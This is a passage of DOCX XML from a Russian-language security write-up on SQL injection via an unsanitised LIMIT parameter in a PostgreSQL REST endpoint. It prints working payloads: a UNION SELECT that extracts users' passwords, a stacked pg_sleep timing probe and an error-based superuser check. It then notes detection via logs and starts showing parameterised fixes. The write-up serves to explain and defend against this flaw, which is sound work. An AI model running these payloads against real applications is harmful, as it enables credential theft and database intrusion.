        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY published_at DESC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">LIMIT 10 UNION SELECT id,password,now() FROM users-- OFFSET 0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PostgreSQL парсит это как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">(SELECT ... LIMIT 10) UNION (SELECT id,password,now() FROM users)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — UNION с привязкой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к первому SELECT. Ответ HTTP-200 содержит rows из </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">articles</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> + rows из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с паролями в поле </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">title</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Связь с 3.1: основной канал извлечения для этого payload.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Вариант B — stacked queries (только в драйверах с simple protocol — psycopg без params, pgjdbc `preferQueryMode=simple`, node-postgres `client.query(sql)` без values; см. 3.5):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /articles?limit=10;%20SELECT%20pg_sleep(5)--&amp;offset=0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">limit = "10; SELECT pg_sleep(5)--"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w: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(в simple-mode):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Сообщение Query ('Q')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Содержит две команды через ';':</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT id, title, published_at FROM articles WHERE status = 'published'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  ORDER BY published_at DESC LIMIT 10; SELECT pg_sleep(5)-- OFFSET 0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Парсер разбивает на два statement, оба исполняются. Response задерживается на 5 секунд — time-based confirmation. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">В extended-mode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (psycopg/asyncpg с params, asyncpg всегда, pgx default) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Сервер отвечает</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ERROR: cannot insert multiple commands into a prepared statement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Parse-стадия отклоняет multi-statement до Execute. Но в показанном уязвимом коде используется </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">text(f"...")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> без params — SQLAlchemy идёт через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">cursor.execute(sql)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> без bind-параметров, что в psycopg2 переключает на text-mode → stacked проходит.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Вариант C — boolean error-based (когда LIMIT в WHERE-подзапросе через f-string):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /articles?limit=(SELECT%20CASE%20WHEN%20(SELECT%20rolsuper%20FROM%20pg_roles%20WHERE%20rolname=current_user)%20THEN%201%20ELSE%201/0%20END)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">LIMIT (SELECT CASE WHEN ... THEN 1 ELSE 1/0 END)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — если current_user superuser, возвращается 1 row; иначе ERROR </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">division by zero</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → HTTP 500 с error message в response. Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">subquery в LIMIT-context</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — PostgreSQL allows since 8.1.</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Полное извлечение данных через UNION (Variant A), confirmation injection через pg_sleep (Variant B), boolean-leak через error в LIMIT subquery (Variant C). LIMIT-injection особенно опасен тем, что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не нарушает синтаксис основного запроса</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — приложение получает валидный ответ HTTP-200, разработчик в логах ничего подозрительного не видит (нет SQL-ошибки), а данные ушли.</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зафиксирует UNION-запрос с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">LIMIT N UNION SELECT ...</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log_min_duration_statement = 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> покажет full query text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HTTP access-log покажет необычно длинный query-string </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">?limit=10%20UNION...</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PostgreSQL по дизайну принимает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как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">expression</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, не только integer-literal. Документация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LIMIT count</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ... where count is an integer-valued expression"*. Это означает, что валидно всё:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">LIMIT 10                                  -- literal</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">LIMIT (SELECT 10)                         -- subquery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">LIMIT (CASE WHEN ... THEN 10 ELSE 5 END)  -- conditional</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">LIMIT NULL                                -- equivalent to no limit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">И — что критично для inject-сценария — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">LIMIT 10 UNION SELECT ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> парсится как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">(SELECT ... LIMIT 10) UNION (SELECT ...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, потому что UNION имеет более низкий приоритет, чем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со всеми его clause-ами. Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">legitimate SQL feature</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (set operations с pagination на каждом sub-select), не bug.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">С точки зрения protocol: bind-параметр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мог бы быть подставлен в LIMIT-position (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">LIMIT $1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">), но разработчик должен </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">явно указать `$1` в SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">передать integer-параметр</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Если SQL собран через f-string без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 параметризации физически нет, и сервер видит готовую строку.</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(поведение LIMIT-context документировано с 7.x).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любая роль с EXECUTE-доступом к эндпоинту (для UNION-extraction — также SELECT на целевые таблицы; типично — те же права, что у application-роли).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Драйвер для Variant B (stacked):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> simple-protocol режим (см. таблицу в 3.5.6).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user-controlled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-cast, передаётся через string interpolation в SQL-builder.</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Pagination через LIMIT/OFFSET — стандартный паттерн REST-API. Правильные шаблоны:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Шаблон 1: type-coerced query parameter + bind-параметр</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">@router.get("/articles")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">async def list_articles(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    limit: int = Query(10, ge=1, le=100),    # ← int + range</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
